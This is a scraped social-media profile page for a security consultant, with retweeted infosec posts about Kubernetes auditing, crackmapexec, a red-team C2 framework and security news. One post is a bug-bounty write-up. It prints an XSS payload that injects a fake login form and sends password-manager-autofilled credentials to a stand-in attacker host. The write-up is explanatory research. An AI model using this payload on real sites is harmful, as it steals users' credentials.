Olivia
Online
Derick Neriamparambil
@dericksiby
A Cyber Security Consultant 🥸
Melbourne
Joined April 2010
174 Following
75 Followers
86 Posts
New Tool Drop: #kubeRadar
A #Kubernetes recon & audit tool.
Get insights into:
• Nodes, Namespaces
• RBAC, NetPols
• Secrets, Pod configs & more
Supports #EKS, #AKS & local clusters.
https://t.co/2qeSg4Fwk8
#AppSec #InfoSec #Hacking
Who to follow
Soumyani1
@reveng007
Red mind. Blue mission. Turning attack tradecraft into detections | CRTO | CRTP | @BlackHatEvents 2024 Arsenal, @WWHackinFest 2024 Presenter and @BSidesSG 2023
MS8
@MohammedShine8
Chapter Lead @AutoSecResGroup-KERALA
Information Security Learner/Bugbounty Hunter.
Tweets are mine and doesn't represent my employer
ARZ
@Arz_101
Smol Pentester | OSCP | OSEP | gib AD | UwU
Someone just sent me an XSS to collaborate on. It was an interesting case so I thought I'd tweet about it.
They'd found an xss in https://t.co/CkURxK6bwR, which was a subdomain that is only used to authenticate users.
They were having trouble escalating the XSS because this subdomain has no access to the main application at https://t.co/WfO0XAPrLD, or the API it interacts with, which is at https://t.co/GoBAfEGRfL.
I immediately thought of something that I'd heard recently (maybe on @ctbbpodcast?) where you can use an XSS to steal auto-filled plaintext credentials, so I thought I'd try to replicate this.
First, injected a fake login form, like this:
<form><input id="email" type="text"><input id="password" type="password"></form>
This is good enough to have a password manager automatically fill the credentials if it is injected into any page on the correct domain.
Now we just needed to send the credentials to the attacker server, I wrote some basic JS to do this:
setTimeout(function(){
httpRequest = new XMLHttpRequest();
https://t.co/cSQ62lEWXN('GET', 'https://BURP_COLLABORATOR?'+document.getElementById("email").value+"="+document.getElementById("password").value);
httpRequest.send();},2000)
The timeout is required because it takes a while for the password manager to autofill the passwords.
Then I used the XSS to inject the form, and the JavaScript, and voila! Plaintext credentials.
This isn't a new technique, I can see there are a bunch of other articles about it - but it's the first time I've exploited an XSS to steal creds from a password manager like this, so I figured some others would find it interesting.
New release of crackmapexec is out ! 6.1.0🥳
This version now support of a new protocol : WMI by @Memory_before ! If the SMB port is filtered, you can still pwn3d everything !! 🔥
Quick list of improvements 🔽
- CME now works against Windows 2003 and Windows 7 (it was broken) 🖥️
- The RDP module has been improved a lot 🦖
- The WinRM protocol has been updated to support codecs 🛃
- The module enum_av can detect more AV 🛂
- Colors has been added on CME to highlight some misconfigurations (smbv1, smb signing) 🟩🟥
- Hash can be exported as hashcat format from cmedb thanks to @al3x_n3ff !
- Audit mode can now reveal the first X chars thanks to @Kahvi0xff
- You can dump IIS appool credentials if configured to work with local or domain users @Shad0wCntr0ller
- A new module WCC from @__fpr to quickly check various Windows configurations and export them 📝
- List all DC IP (usefull to find old dc on other subnet)
- Enumerate and identify Trust Relationships on domain @Shad0wCntr0ller
And also many fix ! 🫡
▶️ Big kudos to @Memory_before for all contributions to this project !
▶️ Thanks to @al3x_n3ff for all the reviews over this release ! 🥰
▶️ Also big thanks to @M4yFly for GOAD lab access
It wouldn't have been such and amazing release without them 🫡
🪂
Full changelog 🔄
https://t.co/iOqS17v7s7
AM0N-Eye
AM0N-Eye is an advanced #RedTeam & Adversary Simulation Software for C2 operations, featuring opsOpec tools and techniques for AV/EDR evasion, shellcode generation, persistence, BOF, and payload generation.
• Linux, MacOS and windows c2 serv… https://t.co/hR8WWeCkqF
Amazing story🥲:
A guy from our Discord found a poor cat in the garden. The cat had an animal RFID tag implant (FDX-B 134kHz), so he scanned it with Flipper, found the cat's owner via the local animal ID database, and they were reunited Turned out that 🐈 was missing for 2 years!
🎉New Website published🎉
🎁To celebrate the launch of the new website, we are giving away three annual Burp Bounty Pro licenses!
👉To participate you have to retweet and like. The winners will be announced on September 30.
👉https://t.co/DXxo2SKrY7
We all knew this was going to happen
Credit: https://t.co/rULBDF8ue0
Good news! Remember that robot dog you saw with a gun!? It was made by @UnitreeRobotics. Seems all you need to dump it in the dirt is @flipper_net. The PDB has a 433mhz backdoor. No need for @gnuradio! https://t.co/xjDepcGYe2 cc/ @UnitreeRobot007 @IrvingRobotics @shunweicapital
@Bugcrowd Just by not burning out!
We promise not to sell Firefox to a billionaire.
After 18 months of battling through restrictions, openings, closures and everything between, we are really excited to announce our event will be going ahead this year on 10/11th Sept. There will be more information coming soon, so stay tuned. Thankyou for all your support.
from @BlackHatEvents USA 2016:
A Journey From #JNDI/LDAP Manipulation to Remote Code Execution Dream Land by @pwntester and @olekmirosh
https://t.co/LbI7BTodtE
now the exploit vector presented in 2016 is the #log4jRCE.
attached slide #11 from the presentation below. :)
❗ ALERT ❗A vulnerability has been identified in certain versions of Zoho ManageEngine ServiceDesk Plus. Exploitation of this vulnerability could allow an unauthenticated cyber actor to perform remote code execution on an unpatched system. Advice at: https://t.co/3SyJhdyX0r
YAS CTF is BACK !!! Registrations are now OPEN.
REGISTRATION IS FREE and THE GRAND PRIZES WILL BE REVEALED SOON.
Go Grab Your Spots Now!!!! https://t.co/lvq5ckdf2O
Registration is open until 26th Nov 2021 10:00 PM IST. 1st prize A$2000 in cash!!
#cybersecurity #ctf
Last Seen Users on Sotwe
Hakan Cinar
Seen from Turkey
Aiman Bboy
Seen from Malaysia
alejandro
Seen from United States
Ibu Mertua
Seen from Indonesia
pov
Seen from Israel
pashto leak video
Seen from Saudi Arabia
Jorge gonzalez 
Seen from Turkey
Amar 😋🍑
Seen from Egypt
Mr. Jerks Off
Seen from United States
Janda Manis
Seen from Indonesia
Most Popular Users
Elon Musk
@elonmusk
240.5M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.3M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.8M followers
KATY PERRY
@katyperry
87.5M followers
Taylor Swift
@taylorswift13
81.3M followers
Lady Gaga
@ladygaga
72.9M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.6M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.8M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62.3M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.6M followers